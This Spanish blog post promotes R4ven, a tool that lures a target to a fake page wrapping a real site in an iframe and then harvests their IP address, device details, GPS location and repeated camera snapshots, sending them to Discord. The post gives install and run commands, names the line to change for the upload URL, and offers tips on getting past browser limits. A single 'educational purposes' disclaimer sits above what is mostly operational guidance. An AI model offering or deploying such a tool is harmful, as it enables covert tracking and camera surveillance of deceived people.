R4ven Rastrea la Dirección IP y la Ubicación GPS del Smartphone o PC
R4ven Rastrea la Dirección IP y la Ubicación GPS del Smartphone o PC
Hacking
·3 Minutos de lectura

R4ven: Rastrea la Dirección IP y la Ubicación GPS del Smartphone o PC

La herramienta aloja un sitio web falso que utiliza un iframe para mostrar un sitio web legítimo y, si el objetivo lo permite, obtendrá la ubicación GPS (latitud y longitud) del objetivo, capturará múltiples imágenes del objetivo junto con la dirección IP y la información del dispositivo.

Esta herramienta es una prueba de concepto y es sólo para fines educativos.

Usando esta herramienta, puedes averiguar qué información puede recopilar un sitio web malicioso sobre ti y tus dispositivos y por qué no deberías hacer clic en enlaces aleatorios o concederles permisos como el de Localización.

Interfaz de uso de R4ven
Interfaz de uso de R4ven
Tabla de Contenido

Características Principales

  • Seguimiento de la dirección IP y la ubicación geográfica
  • Recopilación de información del sistema del dispositivo
  • Captura de imágenes de la cámara del dispositivo
  • Integración con Discord para la presentación de datos
  • Interacción del usuario para el permiso de localización
  • Visualización de un sitio web a través de un iframe incrustado
  • Recopilación periódica de datos basada en intervalos
  • Acceso y carga de imágenes de la cámara web
  • Formato y presentación de datos en mensajes de Discord
  • Enlaces a Google Maps y Google Earth basados en la ubicación
  • Gestión de errores en caso de denegación de permisos de localización
  • Comentarios de los usuarios y mensajes de error

En el enlace si se hace clic:

  • Obtendrá automáticamente la dirección IP y la información del dispositivo.
  • Si el permiso de localización está permitido, obtendrá la localización exacta del objetivo.
  • Si se permite el permiso de cámara, capturará sin parar desde la cámara frontal.

Limitaciones

  • Asegúrate de que el puerto de reenvío de lo contrario no funcionará en el navegador del teléfono inteligente
  • La mayoría de los navegadores bloquean automáticamente los permisos adicionales para URL basadas en IP.
  • No funcionará en los ordenadores portátiles o teléfonos que no tienen GPS o sin cámara,
    • navegadores que bloquean javascript,
    • o si el objetivo está burlando la ubicación GPS.
    • o si el objetivo está usando VPN o IP falsa.
  • Algunos navegadores bloquean automáticamente el permiso de localización como (Brave, Safari, etc)
  • Funciona mejor con el navegador Chrome
  • La precisión de la ubicación será más precisa si se utiliza esto en un smartphone.

Localización IP VS. Localización GPS

Localización con r4ven
Localización con r4ven
  • La localización geográfica basada en la dirección IP NO es exacta,
  • No proporciona la ubicación del objetivo.
  • En su lugar, proporciona la ubicación aproximada del ISP (proveedor de servicios de Internet).
  • El GPS obtiene una localización casi exacta porque utiliza coordenadas de longitud y latitud.
  • Una vez concedido el permiso de localización
    • Se recibe información de localización exacta con una aproximación de 20 a 30 metros de la ubicación del usuario. (es casi la ubicación exacta)

Instalación

git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py

NOTA: Si no vas a utilizar localhost (http://127.0.0.1:8000/image)

Modifica esta línea (archivo index.html) con la URL que desees utilizar:

203. xhr.open('POST', 'http://127.0.0.1:8000/image', true);

O

Por favor, utiliza la bandera -t para elegir una URL diferente.

Utiliza el siguiente comando para hacer r4ven ejecutable:

chmod +x r4ven.py
python3 r4ven.py [-t target] [-p port]

Ejemplo:

python3 r4ven.py -t https://replit.com/myproject/images -p 8080
r4ven en funcionamiento
r4ven en funcionamiento
https://github.com/spyboy-productions/r4ven

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda